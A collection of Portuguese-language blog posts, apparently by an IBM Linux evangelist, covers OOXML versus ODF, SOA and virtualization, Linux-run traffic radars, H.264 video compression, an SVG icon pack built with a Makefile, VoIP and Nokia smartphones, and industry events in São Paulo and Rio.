Simples de Implementar

Especificação do Microsoft Office Open XML, impressaEstas são as 6000 páginas impressas da especificação do Microsoft Office “Open” XML.

A que tem “aberto” no nome, mas ninguém pode participar de seu desenvolvimento. Aquela que não tem nenhuma outra implementação além da do Microsoft Office.

Aquela que foi objeto da assertiva da Microsoft ao dizer que ter vários padrões é bom.

É o “padrão” que concorre com o ODF, que por sua vez é bem mais simples e tem dezenas de implementações em softwares como o OpenOffice.org, BROffice.org, KOffice, Gnumeric, IBM Open Desktop, etc.

Conta a lenda que a Microsoft não tinha a menor intenção de abrir a especificação do OOX, mas como o ODF virou um padrão ISO, a Microsoft documentou a toque de caixa a sua proposta de formato para documentos de escritório, para enviar para pré-padronização pelo ECMA.

Pelo jeito foi um longo trabalho. Em todos os sentidos.

Cinema Europeu

Cinema europeu, ou não-só-americano, é legal. Os melhores filmes que já vi não são americanos: Excêntrica Família de Antônia, Gato Preto, Gata Branca, O Abraço Partido, Felicidade (que é americano, mas de uma facção alternativa) e outros.

Mas quando vem coisa ruim, é de lascar. É quase arriscado assistir um filme europeu, porque é altíssima a chance de não prestar. Por isso cinema americano-popular dá certo: você vai com certeza pelo menos se divertir, mesmo que o filme não toque o âmago do seu ser.

Outro dia a Tati me levou para assistir A Leste de Bucareste.

  • — Tati, tem certeza que quer assistir esse filme romeno ?
  • — Sim. Você tem que largar mão de só assistir filmes blockbuster.
  • — Bom, é só “para não dizer que não falei das flores”.

Filme ruim de doer, mas o veredito dela foi “ah, bonitinho vai”.

Sabe quando sua sobrinha de 3 anos te dá um rabisco feito com lápis-de-cor? Você pendura na geladeira, mostra pros amigos e tal. É bonitinho porque foi ela quem deu. Mas aquilo não é arte nem nada, afinal ela só tem 3 anos e está aprendendo a manusear lápis.

É a mesma coisa com esses filmes alternativos ruins. Na maioria dos casos, poupe-me, por favor.

SOA, Web Services, Virtualização, Grid, Web 2.0: Mashup gigante

SOA é um estilo de arquitetura que tenta alinhar melhor processos de negócio com a TI.

Apesar de os frabricantes de TI — como a IBM — serem os que mais falam sobre isso, ingressar em SOA significa primeiro modularizar seus processos de negócio para depois mapear isso aos módulos de aplicações e infra-estrutura.

Grid é um conceito meio obsoleto. Como conceito, mas não como tecnologia. O conceito é obsoleto porque sua atuação é extremamente estrutural e muito complexa. Toda a terminologia relacionada a Grid tem caráter técnico, difícil de explicar e de nada adianta uma empresa pensar em Grid se seus processos de negócio e aplicações que os implementam não estiverem modularizados.

Por isso inventaram SOA. Para que provedores de TI pudessem ter um discurso mais ameno e acessível ao vender a idéia para gestores em seus clientes. E também para atacar o problema do excesso de complexidade da TI do cliente em sua raiz: na modelagem de seus processos de negócio.

E Web Services, onde entra? Dividindo em camadas, o conceito de SOA mora na fronteira entre negócios e TI. Na hora em que os processos vão se materializar em software e aplicações, a boa prática sugere usarmos certos padrões de desenvolvimento, de integração entre módulos. Esses padrões foram agrupados juntos nas especificações de Web Services, e se preocupam em definir como se faz chamadas a serviços (métodos) remotos, como um serviço encontra outro, etc. Então, nessas camadas conceituais, Web Services encontra-se logo abaixo de SOA.

E Grid está logo abaixo de Web Services. Ocupa-se dos mesmos problemas e soluções, mas com abordagens mais operacionais. Grid nasceu em um ambiente científico e WS em um ambiente de aplicações de negócios. Reinventaram a roda um do outro diversas vezes. Mas nos últimos anos têm juntado esforços para limpar os overlaps a fim de produzir um único conjunto de métodos e boas práticas.

Tudo isso é Virtualização

Se a virtualização de hardware (Xen, VMWare, z/VM) divide um equipamento em vários pedacinhos, SOA, WS e Grid dividem a aplicação em vários pedacinhos funcionais.

A virtualização de software (SOA, etc.) é mais difícil de fazer. Mas é também muito mais poderosa que a de hardware. Traz benefícios mais consistentes, mais abrangentes (porque tiveram que arrumar a casa dos negócios antes) e de mais longo prazo.

Tudo isso tem a ver com a Web 2.0

Explicar Web 2.0 está fora do escopo agora, mas sua arquitetura tem muito a ver com SOA.

Ao invés de feeds, podcasts e APIs JavaScript da Web 2.0, SOA tem serviços, provedores de dados e de funcionalidades. Equivalente ao HTML, capaz de juntar funcionalidades e dados de diversos sites, SOA tem a Linguagem de Execução de Processo de Negócio (BPEL, que é XML) que define a ordem e dependências ao juntar Web Services para formar uma aplicação maior. O papel das tags e folksonomy da Web 2.0, é exercido pelo UDDI no contexto de Web Services.

Mashups da Web 2.0 (experimente o iGoogle) são as Aplicações Compostas do SOA (veja também na Wikipedia).

E o Enterprise Service Bus do SOA (também na Wikipedia) tem o Browser como seu equivalente na Web 2.0. Sim, porque ambos tem a missão de materializar as conexões lógicas definidas pelo DHTML ou BPEL.

Web 2.0 é a Arquitetura Orientada a Serviços global.

Indústria do Medo

Estão instalando aqueles portões duplos no meu prédio, também conhecidos por eclusas ou “jaulinha”, para aumentar a segurança.

Gostaria que alguém me explicasse como uma grade extra evitaria que um ladrão convicto apontasse uma arma, do lado de fora, ameaçando o zelador que está do lado de dentro.

Que me explicasse como evitaria que esse mesmo ladrão entrasse na cola de algum morador, ou pela garagem na cola de um carro do prédio.

E quando vem uma visita num dia de chuva, ao invés do zelador abrir o primeiro portão para que ela espere ser autorizada sob um teto seco, e só aí passar pelo segundo, não, ela tem que esperar do lado de fora, tomando chuva, graças a uma regra sem pé nem cabeça do condomínio.

O mesmo para o entregador do restaurante, que o porteiro já conhece de todos os domingos, mas não deixa subir, obrigando a gente a descer de pijama e pantufas para pegar a pizza que já esfriou com todo esse protocolo.

Na verdade não houve nenhum caso de roubo na minha rua. Parece que tem uns banqueiros ricaços morando aqui perto, e os edifícios são cheios dos seguranças. Além dos da escola que fica no mesmo quarteirão, e os do shopping, um quarteirão prá lá, e os da academia, e os da boutique de sapatos, e os das sinagogas. Isso sem contar que o shopping faz a rua ser supermovimentada por pedestres que vêm e vão a caminho do Metrô Marechal Deodoro.

Instalam essas jaulas feias por uma vontade incontrolável de gastar o dinheiro do condomínio, ou por ignorância, ou por terem comprado a idéia do medo generalizado. Ou porque acreditaram nos argumentos vagos e inexplicados de algum VP do sindicato da habitação que ainda hei de provar que é sócio de uma dessas firmas de segurança.

A maioria dos perigos da cidade estão só na cabeça das pessoas. E quem não tem essas caraminholas vive seguro.

Estúpido meme do medo.

A “Outra” Comunidade Open Source

O Tux corporativoEu acho vibrante ser membro da comunidade Open Source, contribuir com código, evangelizar e encontrar geeks em eventos para escovar bits verbais sobre módulos do kernel a ideais futuristas.

Mas tem uma outra Comunidade Open Source que estou me tocando que existe e que faço parte: a corporativa.

Sim, existe uma seita de engravatados que tem o Tux como mascote, carregam-no como broches em seus ternos, e conversam sobre um monte de assuntos interessantes, inclusive Linux e Open Source.

Ontem fui a um jantar que a Linux Magazine promoveu em São Paulo para os patrocinadores de seus eventos Linux Park. Estavam presentes todos os representantes da seita: Gouveia pela LPI, Annunciação, Tamaris, Carol pela Novell, David Barzilay pela Red Hat, Meyer, Edmundo e Batista pela Itautec, Sulamita a Linux Chix de cabelo vermelho da Intel, Edson pela Fujitsu, Rafael pela revista, e eu pela IBM. Faltaram (de fazer falta mesmo) Oracle, HP, e outros.

Enquanto os geeks trocam pessoalmente chaves GPG de criptografia (juro que vi esse ritual num evento do KDE, na Alemanha), nós, os engravatados, vibramos com o ritual do trading de cartões de visita. Brincos, piercing, cabelão são trocados por gel e bons perfumes. Um tom de voz idealista e revolucionário é substituido por um tratamento formal, moldado por anos de prática em atendimento a clientes. Num evento geek como o FISL é comum ver muitos, em público, focados em seus laptops, construindo código, enquanto nessa nova seita os coffee-breaks são importantes para construir relacionamentos. Network de dados versus o networking corporativo.

As duas facções dessa comunidade — a geek e a corporativa — são importantes e se completam. Uma gera tecnologia, a outra trata de dar um sentido prático e de valor comercial. Uma idealiza e pensa no amanhã, e a outra comunica e prepara o terreno hoje. Os geeks vão ao fundo da tecnologia, e a corporação trata de moldá-la para ser user friendly e de fácil compreensão. E da mesma forma que Fedoras e Slackwares esquecem suas diferenças a fim de trabalhar por um ideal comum, Red Hats e Novells, IBMs e Itautecs e HPs, etcs e etcs comungam juntos para o bem de um mercado livre e grande o suficiente para todos. As comunidades engravatada e a geek não podem existir uma sem a outra e vice-versa. E fico feliz em navegar bem entre as duas.

O jantar estava ótimo e se estendeu até tarde. Tive que sair umas 11 por completa exaustão física e mental, depois de um dia cheio, com muita evangelização num evento para parceiros, sobre Linux em System z (o famoso mainframe).

Suas Multas e Linux

Sabe aquela multa de radar que você recebeu? Foi enviada pelo Tux.

Mas não o culpe por isso. Linux só foi a base tecnológica para todo o sistema.
Ontem conversei bastante com o pessoal da Engebras, empresa que cria e administra a maioria dos radares de São Paulo e outros estados. Já tinha ouvido falar que todos os sistemas para suportar essa monitoração era baseada em Linux, e eles contaram mais detalhes. Continue lendo…


Os radares são na verdade câmeras analógicas com sensibilidade melhorada conectadas a computadores próximos que rodam Linux que por sua vez digitalizam a imagem instantaneamente com a ajuda de placas de captura de vídeo. As placas dos carros são imediatamente reconhecidas por OCR por uma biblioteca de uma empresa israelense, a multa é impressa, enviada pelo correio, recolhida no banco e repassada para o governo estadual, federal ou município, dependendo da jurisdição.

Todos os carros que passam por um radar — infrator ou não — são filmados. Não é uma câmera fotográfica, e sim uma filmadora.

Tazo (gerente de informática da Engebras) e seu pessoal afirmaram que todos os sevidores da empresa rodam Linux. Coisa de 50 a 60 servidores. Mas são servidores paravirtuais. Porque servidores físicos mesmo a empresa tem menos de 10.

Fiquei feliz em ver um exemplo vivo de um datacenter inteiramente virtual, e imaginei a flexibilidade operacional que eles tem em fazer movimentações de serviços sem indisponibilidades.

Mostraram sua extranet onde pode-se ver as fotos de infrações do momento, mais estatísticas de variação de velocidade média por hora, número de veículos, e até seu tamanho. Mostraram também como motoqueiros cometem infrações, mas escondem sua placa com a mão.


Além disso, imediatamente consultam uma base de dados de veículos não licenciados (em MySQL), mas aqui não se pode multar por radar. Por outro lado uma aviso é enviado para a polícia da região, avisando a placa e o ponto onde o veículo foi detectado.

40% da frota nacional não é licenciada, inclusive viaturas da polícia.

Há também os radares de farol, onde não basta uma imagem estática. É necessário registrar o movimento do veículo ultrapassando o sinal vermelho como evidência. Neste caso são usados softwares livres como ffmpeg para gerar este clip em MPEG.

A comunicação entre os radares e o datacenter central é geralmente provida por GPRS, pelas operadoras de celular da localidade.

Se tiver sorte, o pessoal da Engebras vai passar no meu blog para dar mais detalhes de sua operação.

Supra-sumo em Compressão de Video

Andei estudando tecnologias de compressão de vídeo e é um mundo fascinante. Tudo sobre Linux.

DivX e Xvid são compressores ainda bons mas de gerações anteriores. O mais moderno e avançado é o H.264 também conhecido por MPEG-4 AVC, padrão ISO. Uma das melhores implementações desse compressor é livre: o projeto x264.

E sobre containers, um dos mais completos hoje em dia é o MP4. Um mesmo arquivo MP4 pode conter uma trilha de vídeo, outra de vídeo em outros ângulos, outra de audio em inglês, outra de audio em português, e outras de legendas em várias linguas, em Unicode, menu como o de um DVD, informação sobre capítulos etc. Isso é um significativo avanço em relação ao container AVI da Microsoft que não suportava nada disso. Pode-se fazer um backup de um DVD para um arquivo MP4, incluindo toda a sua interatividade, menus e capítulos.

Apesar do nome sugestivo, MP4 não é a evolução do MP3. Afirmar isso é como dizer que .gif evoluiu para .tar, coisa que não faz sentido. A evolução do MP3 é AAC e HE-AAC. MP4 (um formato de container) pode conter streams MP3 (um formato de audio), como fiz abaixo, mas o mais natural e moderno é um MP4 conter streams AAC.

Converti um vídeo de 53 segundos que fiz com minha câmera. Veja a comparação:

  Original.avi Comprimido.mp4
Geral 53s, 15.077 kb/s, 640×480, 30 quadros por segundo 53s, 2.495 kb/s, 640×480, 30 quadros por segundo
Tamanho 100.326.316 Bytes 16.639.145 Bytes
Trilha de vídeo 99.697.780 Bytes, compressão Motion JPEG 15.952.188 Bytes, compressão H.264
Trilha de audio 586.888 Bytes, formato PCM mono 11,024 Hz 657.699 Bytes, compressão MP3 mono 22,05 Hz 64kbps
Overhead do container 41.648 Bytes ou 0.04% do tamanho do arquivo 29.258 Bytes ou 0.18% do tamanho do arquivo

Há duas discrepâncias aqui:

  1. O tamanho relativo do container deveria ter diminuido.
    O overhead do container MP4 é bem menor que AVI, mas como o tamanho do vídeo diminuiu muitíssimo, isso distorceu a relação do tamanho do container com o do arquivo. Se transferíssemos sem recomprimir os streams de audio e vídeo do AVI p/ MP4, veríamos uma significativa queda de overhead do container.
  2. O tamanho da trilha de audio aumentou.
    O fato é que tive sérios problemas para compactar o audio. Minha câmera grava som em formatos tão baixos que tive que aumentar a freqüência do sinal para o arquivo ser aceito pelo LAME. E ai usei bitrates talvez altos de mais para a compressão. Mas ganhei tanto com o H.264 que nem vou esquentar a cabeça.

O vídeo final é de alta qualidade (comparado com o original), e não consegui perceber diferença entre eles. Olhei várias vezes, com muita atenção.

Eu ainda fiz questão de alta qualidade, e mantive o bitrate em 2495 kbps. Poderia ter diminuido mais ainda o tamanho se fizesse compressão em 2 passos. Filmes em formato Xvid (MPEG-4 ASP) que se baixa da Internet, em boa qualidade, tem aproximadamente 850 kbps. É esperado que se dermos só 850 kbits para o H.264 trabalhar 1 segundo de vídeo, obteremos resultados melhores comparados ao Xvid.

The Blog Icons

This is a collection of high quality vectorial icons to represent common ideas and actions of the blogosphere.

They were based on the SVG work from FeedIcons.com. The base button is the same, but mathematically simplified on the XML level. New buttons were added based on other popular icons found on the web or created by myself. Also some redesign was made for new shapes to make the icons look better when exported to smaller image sizes.

By the way, I am not a designer nor an artist. I just know how to use SVG-creation tools as Inkscape or make good XML. Or I just have a blog demanding for these icons. So I’m sure people can contribute better color mixings an outlines. Let me know and lets integrate your ideas into this project in the right way.

Please share alike this icons. They have a Creative Commons license. I appreciate if you can link to my blog when using them.

Icons for Feed and OPML

Feed IconThese icons where the base for this work, specially the feed icon as found in its website. They were probably created with proprietary tools such as Adobe Illustrator and then exported to open formats such as SVG or PNG. The original OPML icon can be found at opmlicons.com

OPML IconThe versions here are visually identical to the original ones, but mathematically simplified. They are now being maintained in an open format — SVG — here, and are a better option because of its open source code and formats, and distribution.

Icons for Trackback and Share

Trackback and Pingback IconThese icons can be found sometimes in the blogosphere. I don’t know who designed them but they are a good representation of the Trackback and Pingback ideas.

The Share icon is not my preferred but for now it is just a copy of what can be found around.

Share IconColors and shapes are identical and based on the feed icon button. I never saw these icons in a size bigger than 16×16 pixels. Now, in a scalable format, they can be rendered at any size you want.

Permalink IconThese are original creations and come in several options. I am still not sure which one is the best. You can also suggest other shapes.

As you can see, I am using this icon to identify that each section on this post has a permalink.

Other Icons

Comment Icon Edit Icon Cancel Icon Tag Icon Download Icon Clock Icon

Other original icons: Comments, Edit, Cancel, Tag, Download, Upload and Clock (to represent date and time). I’m open to suggestions for better shapes.

Challenges for Icon Sizes

The original design of these icons (from feedicons.com) looks wonderful on sizes bigger than 22 pixels, but most people will use them on small sizes as 16×16. So this package delivers also shape design that look better on small sizes as 22×22, 16×16, etc. I am using these sizes all around my blog as you can see.

Converting the SVG Files into Images

In the Blog Icons ZIP file you will find the XML:SVG source code for all icons. Additionally you will get all icons in PNG (preferred), GIF and JPG formats, in common sizes from 10×10 to 128×128 pixels. If you want a specific size, you can import the source SVG file in some graphical tool as Inkscape (on Linux), or CorelDraw, Adobe Illustrator, etc and export them into any format and size you want.

Or use the Makefile like this (on Linux you will need Inkscape and ImageMagick installed):

Make all default sizes of all icons, in PNG, GIF and JPG:

bash$ make all

Make Feed icon in GIF format, at 40×40 pixel size:

bash$ make SIZE=40 feed.gif

Make all icons, all formats at 40×40 pixel sizes:

bash$ make SIZE=40

Evento sobre Soluções Práticas para Linux

Vamos realizar aqui na IBM um evento gratuito para empresas e profissionais que prestam serviços de TI. O objetivo é mostrar possibilidades de arquiteturas que poucos conhecem mas que trazem enormes benefícios operacionais e financeiros, pois usa computação de forma ecônomica.
Abordarei os seguintes assuntos:

  • Posicionando Open Source e Linux no TI das empresas
  • Clusters de Alta Disponibilidade e Replicação
  • Paravirtualização: a última tendência em virtualização de Hardware
  • Esquemas especiais de segurança com SELinux e AppArmor
  • Grid e SOA com Linux
  • Possibilidades de Linux no desktop
  • PC Multiusuário
  • Formato OpenDocument
  • Outros

Será dia 8 de maio, próxima terça, das 14:00 às 17:30 na IBM São Paulo (rua Tutóia 1157). Sala TU02-226.

Confirme presença com a Fernanda Moraes <femoraes@br.ibm.com> por e-mail ou no telefone 11-2132-5691.

Adicione:

Venha conhecer mais profissionais de sua área, trocar idéias e tomar um café.

O Efeito Online

Estou usando barba a uns 2 anos.

Mas nesse tempo todo não troquei minhas fotos online, tipo a do MSN Messenger, Orkut, etc. No cyberespaço estou sem barba.

Ai, reencontro pessoas que não me vêem a uns 6 meses (as últimas vezes que me viram ao vivo já estava com barba), mas me dizem que estou diferente, que deixei a barba crescer !!

Isso tem acontecido com muita freqüência.

Conclusão: inconscientemente, as pessoas esperam me enxergar ao vivo com a mesma fisionomia que me vêem online.

Maravilhas da Telefonia Moderna

Vou usar este post para descarregar as coisas maravilhosas que tenho descoberto sobre telefonia móvel, VoIP, e suas aplicações para o mundo corporativo.

Este assunto é fascinante e importante porque telefonia móvel está intimamente ligada a conectividade móvel. A pessoas estarem 100% do tempo conectadas, trocando informações e conhecimento. Desde Graham Bell muita coisa mudou e o conceito todo foi diversas vezes reinventado.

  • VoIP é um assunto de muitos donos. Cada fabricante de PBX (central telefônica, Cisco, Avaya, Nortel, etc) inventa seus protocolos proprietários. O padrão universal se estabeleceu com o SIP, que é um protocolo muito parecido com HTTP.
  • A partir do momento em que duas pontas (computadores, smartphones) tem IPs e um software capaz de “falar” SIP, elas podem fazer uma conexão direta e começar a conversa de voz, video, ou texto.
  • Um softphone é um software que implementou o padrão SIP. Isso é muito fácil, em parte porque o SIP é um padrão aberto. Em Windows eu uso o PhonerLite e em Linux uso o Ekiga e o KPhone.
  • A parte proprietária do SIP são alguns codecs de voz: eles são necessários para comprimir (e descomprimir) a voz entre os interlocutores, e funcionam mais ou menos como compressão em MP3, só que otimizados para voz. Os proprietários são o G.711, G.726 e os codecs abertos são os excelentes Speex e o iLBC. Se não há um codec comum entre as duas pontas, algum intermediário terá que fazer a conversão, e esse é um dos papeis do PBX (ou central telefônica).
  • Pode-se montar uma central telefônica em casa com um PC velho e com pouca RAM, usando o Asterisk, que nada mais é do que um software que implementa a lógica de uma central. Mais fácil ainda, pode-se usar o life CD do AstLinux (que contém o Asterisk) e bootar qualquer PC como um PBX IP.
  • Pode-se montar uma central telefônica online gratuitamente, usando serviços como o PBXes. Cadastra-se os usuários e seus softphones e pode-se configurar serviços como um número para conferência, número que faz tocar vários telefones simultaneamente, caixa postal, voice mail para e-mail, etc.
  • Para usar SIP para ligar para números de telefonia convencional (land lines) no mundo todo, é necessário comprar serviços de minutagem de algum provedor. O mais barato que conheço é o SIP Discount com preços realmente agressivos, e alguns países totalmente gratuitos. Esse processo todo é similar a usar o Skype, só que o software é genérico, e a minutagem é muitíssimo mais barata. Diga-se de passagem, entre todos esses serviços de minutagem VoIP, o Skype é o mais proprietário e de longe o mais caro. Outros serviços são o Ekiga.net, Gizmo, VoIP Discount (da mesma empresa do SIP Discount, mas com softphone proprietário).
  • O único inconveniente em usar SIP é substituir o telefone pelo computador. Na prática é desconfortável, e não temos um computador conectado sempre conosco. Mas isso já está sendo resolvido. Leia adiante.

Nokia: O Celular das Pessoas Conectadas

A Nokia não me pagou para dizer isso, mas com certeza meu próximo celular será um smartphone desse fabricante, da linha N ou E.

  • Esses celulares mais avançados tem um cliente SIP embutido e integrado. Ao se escolher um número da agenda para ligar, ele pergunta se a ligação é normal ou pela Internet. Até aí não há nenhuma diferença em pegar um smartphone qualquer, por exemplo baseado em Windows Mobile 5.0, e instalar um softphone nele. Mas esse SO não vai te deixar ficar on line o tempo todo: sua bateria vai acabar antes da hora do almoço.
  • Esses celulares tem WiFi, mas não é esse o fator mais importante. WiFi em um handheld seca sua bateria em menos de duas horas conectadas. O que realmente importa é que o Symbian OS (sistema operacional desses aparelhos) foi otimizado para se manter sempre conectado por WiFi, mas economizando energia quando não há dados trafegando. Mais ainda: quando se muda de localidade, ele detecta a mudança, se reconecta e se reconfigura.
  • Quando não há redes WiFi (mais baratas ou gratuitas), pode-se usar outras redes de dados, tipo GPRS (do GSM) ou WCDMA (do CDMA). O Symbian OS trata de fazer a troca de redes de forma transparente, sem interrupções. Essa gerência automática de redes somada a otimização de uso de energia para WiFi faz esse SO ser realmente especial.
  • O SIP integrado ao celular elimina o inconveniente de precisar de um computador. O celular é o computador conectado a Internet o tempo todo, da forma mais barata possível para uma localidade que se está.
  • Uma equipe de funcionários de uma mesma empresa, portando celulares com VoIP como os da Nokia (que na verdade são os únicos do mercado hoje), usando serviços gratuitos como os do PBXes, poderão se telefonar com push-to-talk (como Nextel), fazer conferências, ter o ramal transferido para o celular, enviar SMSs, fazer video conferências por IP (no novo N73), etc, de graça. Isso quando estiverem associados a uma rede WiFi, como as de seu escritório, ou em casa. Quando estiverem na rua, ainda poderão fazer tudo isso com VoIP sobre GPRS a custos bem mais baixos do que os dos minutos de voz GSM ou CDMA, porque o custo-benefício de voz comprimida sobre IP é melhor que o de voz tradicional.
  • Para ligações internacionais ou quando estiverem viajando, esses usuários poderão receber ligações VoIP gratuitamente em seus celulares, ou fazer a custo muito baixo com serviços como SIP Discount. Além de literalmente levarem seu ramal consigo.
  • Além do mais esses celulares contam com um arsenal de ferramentas para a web, tais como um ótimo browser, melhor que a média dos handhelds do mercado, player de multimídia incluindo filmes e leitores de feeds. A soma desses elementos faz o celular ser um ótimo cliente para podcasts. Se o som do seu carro tiver bluetooth, seu Nokia pode transmitir seus podcasts favoritos para ele enquanto estiver dirigindo para o trabalho.

Se as informações aqui estão um pouco desestruturadas é porque isso foi um “dump mental” mesmo. Para compartilhar rapidamente esse conhecimento com você, leitor.

Festa no Novo Escritório da Red Hat Brasil

A Red Hat comemorou hoje seu novo escritório num dos edifícios mais novos e elegantes de São Paulo.

Endereço do novo escritório da Red Hat

Muitos parceiros e clientes foram confortavelmente recebidos para um coquetel espaçoso num escritório colorido, decorado com uma mistura de cartazes de propaganda de produtos, e outros com a famosa frase de Gandhi que foi adotada pelo Open Source:

Primeiro eles te ignoram, depois eles riem de você, depois eles lutam contra você, e depois você vence.

A primeira coisa que chamava a atenção era a “Sala de Descompressão”, onde o pessoal pode relachar jogando games. Mas depois nos levaram para conhecer as espaçosas salas de reunião, as bem equipadas salas de aula, e as salas dos gerentes.

Havia realmente muito espaço que eles pretendem preencher com novas contratações de vendedores, sales engineers, pessoal de marketing etc. E havia ainda a outra metade inteira do andar para mobiliar e ocupar. Mas em pequenos passos.

A Red Hat (ou Rêd Hétchi, como diz Alejandro Chocolat, argentino gente boa que comanda a empresa no Brasil) inaugurou sua operação por aqui ao comprar a Latin Source, empresa que já os representava no cone sul.

Estavam todos presentes: Chocolat com seu inconfundível sotaque, Julian, Gabriel Szulik (com o mesmo sobrenome do diretor mundial da empresa, mas que afirma não ser parente dele), Rodrigo Missiagia e suas belas camisas caneladas, Filipe absorvido em resolver o problema de um cliente, David Barzilay com um terno novo e bonito, Leticia, Edgar (o sopro Java/JBoss na equipe técnica de vendas), Paulo Banitz e outros tantos que lamento não lembrar o nome.

O ar da empresa tem um quê de Google: aquele ambiente descontraido onde todos trabalham por prazer, fazem o que gostam, e ainda estão na ponta da tecnologia. Eles pretendem dobrar de tamanho em um ano.

Há um lado oculto da empresa: o laboratório de tecnologia. É oculto porque seus membros não ficam muito a vista, imersos em melhorar o kernel do Linux, o JBoss, e escovar outros bits. É o lar de figurões como Marcelo Tosatti, Acme e outros.

A conversa com o Edgar, figura Java, foi particularmente interessante. Ele veio da Summa e está a uma semana na Red Hat. É o primeiro da empresa que tem a missão de falar sobre JBoss com o mercado. Contou que muitos clientes já usam JBoss gratuitamente, e que agora é hora de provar o valor de terem também suporte comercial. Contei que achava muito importante a Red Hat ter comprado a JBoss. Na linha do tempo de decidir qual tecnologias adotar, uma empresa pensa antes na plataforma de aplicações (coisas como o JBoss, WebSphere, middleware em geral), e só depois no sistema operacional (Linux). No tecnês do dia a dia, dizemos que sistema operacional é um mal necessário. Ter uma oferta tão estratégica e expressiva como o JBoss coloca a Red Hat numa posição adiantada nessa linha do tempo.

Resumo da ópera: a festa foi superdivertida e ótima para encontrar os amigos do nosso mundo de Linux comercial no Brasil.

Notas Sobre Evento de Virtualização da Novell no Rio

Ontem aconteceu o evento de Virtualização da Novell na primeira cidade brasileira: Rio de Janeiro.

Houve palestras ótimas da HP, AMD, Novell, e outros parceiros da Novell.

Roberto Brandão da AMD mostrou os detalhes arquitetônicos de seus novos processadores AMD-64 (Opteron). Gráficos esclarecedores sobre como os bits trafegam entre chipset, CPU, RAM, etc. Muito convincente. Contou também que o quadcore da AMD é o primeiro produto líder de mercado da companhia, com mais de 50% de share. Seus quadcore são realmente quatro CPU completas embutidas num chip só, incluindo gerência de memória autônoma, etc. Segundo ele, isso é mais difícil de fazer (mas traz melhores resultados de processamento e consumo de energia) do que a abordagem de dual-dual-core (dois dual core no mesmo chip), do concorrente, que não citou o nome.

Se eu tiver sorte, ele vai passar aqui no meu blog para contar mais. Roberto foi também o que mais se aprofundou nos detalhes da nova paravirtualização, e quase me deixou sem palavras. Eu tinha a pretensão de ser o único a dissecar este assunto…

Roberto contou que as novas versões do AMD-V vão ter novidades para I/O, e que estão melhorando o processador para que a virtualização tradicional (sem paravirtualização) seja mais eficiente. Obviamente essas características poderão ser aproveitadas por hypervisors de paravirtualização também.

Alexandre Gourdard da HP mostrou os blades e as abordagens que a HP tem para virtualização, tanto em Linux, Windows e HP-UX. Foi bastante focada em hardware e em serviços de gerência.

Richard Doll da Novell fez algumas apresentações. A mais interessante foi sobre o acordo com a Microsoft, e seus pontos de colaboração: (para) virtualização, gerência de identidade e federação de diretórios, formatos de documentos, administração de sistemas (integrando o Windows Updates com soluções da Novell), etc. Claro que a Microsoft quer engolir o mercado de Linux e vice-versa. Ninguém vai para o céu aqui (nem a comunidade Open Source). Mas acho que essa parceria tem pontos positivos.

Eu entrei envorgonhado porque os apresentadores antes de mim já tinham falado praticamente tudo que se podia falar sobre virtualização. Bem, virtualização de hardware somente. Mostrei a linha do tempo desse tipo de virtualização, como a IBM criou esse conceito em 1967, e até 1998 (ano de surgimento da VMWare) era a única que fazia isso. Até 2003, o ano que mudou tudo com a criação do Xen, e a reinvensão da Paravirtualização.

Mostrei os dados do Gartner que mostravam as “10 hipest technologies” para os próximos 18 a 36 meses, que tem virtualização no topo, seguido por Grid e SOA (que nada mais são do que formas diferentes de virtualização). Linux para aplicações importantes aparece em sétimo lugar.

Falei sobre virtualização de storage com o SAN Volume Controler, mostrando os benefícios em relação ao SAN tradicional.

Claro, falei sobre Xen explicando as diferenças em relação a virtualização tradicional. É incrível como todo mundo fala sobre Xen, mas não explica como e porque a parvirtualização é melhor. Acredito que se os defensores do Xen não deixarem isso claro na cabeça das pessoas, elas não vão comprar a idéia. É importante ressaltar isso.

Nas minhas tradicionais viagens filosóficas, depois de mostrar o Xen e seus benchmarks, levantei o seguinte: se a paravirtualização traz uma série de benefícios operacionais, a praticamente nenhum custo de performance, por que agora não podemos virtualizar a totalidade de nosso datacenter? Não só as pequenas instalações, mas também os grandes DBs, etc que geralmente são instalados em máquinas dedicadas. Serão máquinas paravirtuais rodando sobre um hardware dedicado. Isso é factível principalmente agora que o VMWare e virtualização da Microsoft implementarão paravirtualização também.

Fiz questão de ressaltar ao longo da apresentação que virtualização vai muito além do hardware. De fato, as virtualizações mais vantajosas, que trazem os melhores benefícios, são os que fazemos no nível do software. Isso levou a entrar no tema da virtualização invertida: Grid e SOA, onde a aplicação é maior que um computador (na virtualização de hardware, o computador é maior que a aplicação). O ponto aqui é repensar a forma como as aplicações são arquitetadas, modularizá-las, componentizar, e usar middleware para simplificar e “virtualizar” a infraestrutura. Parece que só eu falei sobre estes pontos.

No fim do evento vários clientes, parceiros, meu ex-chefe e o pessoal da Novell me comrpimentou dizendo que fiz a melhor apresentação.

Fiquei lisongeado e orgulhoso. Principalmente quando todas as outras apresentações foram tão boas.

Confira se o evento vai para sua cidade, e venha. É gratuito.

Arquivo da apresntação em ODF (5.1 MB) para OpenOffice.org e outros e em PDF (7.4 MB).

Como Criar um Website

Este guia é para você que é leigo em computadores, mas que precisa contratar alguém para fazer o site de sua empresa, restaurante, hotel, etc. Vai ajudá-lo a ter um site mais acessível, prático e funcional, usando padrões e técnicas novas e que os usuários gostam, e deixando de lado as técnicas não muito naturais da web, ou que não é de boa prática o seu uso.

Quando for comprar serviços para criar seu site, exija os seguintes pontos (os links levam para as explicações):

  1. Quero um site onde eu mesmo posso atualizar o conteúdo, como se fosse um blog.
  2. Onde hospedar o site, em que computadores ele vai rodar ?
  3. O site/blog não pode ser feito em Flash.
  4. O site/blog deve ser compatível com qualquer browser em qualquer plataforma, principalmente Firefox, Internet Explorer, Safari e Opera.
  5. Não é necessário ter uma animação de abertura.
  6. Não pode haver popups nem frames, deve ser de fácil navegação e usar permalinks semânticos.
  7. O site/blog deve conter informações objetivas e precisas.
  8. O site/blog deve usar tecnologias abertas e não-proprietárias.

Seguem os detalhes de cada ponto…

Não se chama mais site, agora é blog

Blogs estão na moda, então entre na moda.

Não é a toa. Se você disser “entre no blog do meu restaurante” ao invés de “site”, as pessoas sabem que estarão mais próximas de quem criou a informação ali, e não só da informação em sí. Na cabeça das pessoas, um site raramente é atualizado, mas um blog sempre tem novidades. O já conhecido formato de blog sugere que os visitantes poderão interagir, comentar.

